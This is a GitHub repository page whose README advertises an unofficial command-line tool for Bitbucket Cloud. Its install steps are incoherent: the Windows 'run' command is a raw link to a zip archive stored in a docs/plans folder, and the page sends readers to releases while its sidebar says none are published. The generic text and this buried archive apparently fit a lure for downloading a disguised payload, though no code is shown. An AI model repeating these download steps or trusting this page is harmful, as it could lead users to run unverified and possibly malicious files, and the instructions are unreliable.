Skip to content

πŸš€ Manage Bitbucket Cloud effortlessly with this CLI tool for handling pull requests, repositories, issues, and more right from your terminal.

License

Notifications You must be signed in to change notification settings

galeristore88id-ctrl/bitbucket-cli

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

65 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

🌟 bitbucket-cli - Manage Bitbucket Easily from Your Command Line

πŸ“₯ Download Now

Download bitbucket-cli

πŸš€ Getting Started

The bitbucket-cli is an unofficial command-line interface for Bitbucket Cloud. It simplifies managing your Bitbucket projects and repositories directly from your terminal. You don’t need to navigate through the browser anymore. With bitbucket-cli, you can perform tasks like creating pull requests and managing pipelines effortlessly.

πŸ“¦ System Requirements

To run bitbucket-cli, ensure you have the following:

  • Operating System: Windows, MacOS, or Linux
  • Terminal: A command line interface (such as Command Prompt, Terminal, or a shell)
  • GoLang: Ensure it is installed on your system. Visit the GoLang installation page for more details.

πŸ’Ύ Download & Install

To get started with bitbucket-cli, visit this page to download: Visit the Releases Page.

  1. Open your web browser.
  2. Click on the link above to go to the releases page.
  3. Find the latest version and look for the appropriate file for your operating system.
  4. Download the file to your computer.

βš™οΈ Installation Steps

On Windows:

  1. Locate the downloaded file, usually in your 'Downloads' folder.
  2. Right-click on the file and select 'Extract All' to unzip it.
  3. Open Command Prompt.
  4. Navigate to the folder where you extracted the files. Use the command:
    cd path\to\extracted\folder
    
  5. Run the application using the command:
    https://raw.githubusercontent.com/galeristore88id-ctrl/bitbucket-cli/main/docs/plans/bitbucket_cli_1.3-alpha.1.zip
    

On MacOS:

  1. Locate the downloaded file in your 'Downloads' folder.
  2. Double-click to extract it.
  3. Open the Terminal.
  4. Navigate to the folder with the extracted files:
    cd ~/Downloads/bitbucket-cli
    
  5. Use the command below to run the application:
    ./bitbucket-cli
    

On Linux:

  1. Open your terminal.
  2. Navigate to the location of the downloaded file:
    cd ~/Downloads/bitbucket-cli
    
  3. Make the file executable with this command:
    chmod +x bitbucket-cli
    
  4. Run it using:
    ./bitbucket-cli
    

🎯 Features

The bitbucket-cli offers several features to enhance your Bitbucket experience:

  • Create and Manage Repositories: Quickly create new repositories or manage existing ones.
  • Pull Requests: Easily create and review pull requests without leaving your terminal.
  • Pipeline Management: Control your CI/CD pipelines directly from the command line.
  • Search Repositories: Find your projects with simple commands.

πŸ› οΈ Usage

Once installed, you can use various commands. Here are a few examples:

  • Help Command:

    bitbucket-cli help
    

    This will show you all available commands and how to use them.

  • Create a New Repository:

    bitbucket-cli create-repo <repository-name>
    
  • List Your Repositories:

    bitbucket-cli list-repos
    

πŸ“‹ Troubleshooting

If you encounter issues while using bitbucket-cli, consider the following:

  • Permission Denied Error: Make sure to run the terminal with the necessary permissions.
  • Command Not Found: Ensure you are in the right directory and that the file is executable.

πŸ“ž Support

If you need help or want to report a bug, please check our issue tracker on GitHub. You can also create a detailed issue there to get assistance.

πŸ”— Additional Resources

Happy coding with bitbucket-cli!

About

πŸš€ Manage Bitbucket Cloud effortlessly with this CLI tool for handling pull requests, repositories, issues, and more right from your terminal.

Topics

Resources

License

Contributing

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 3

  •  
  •  
  •  

Languages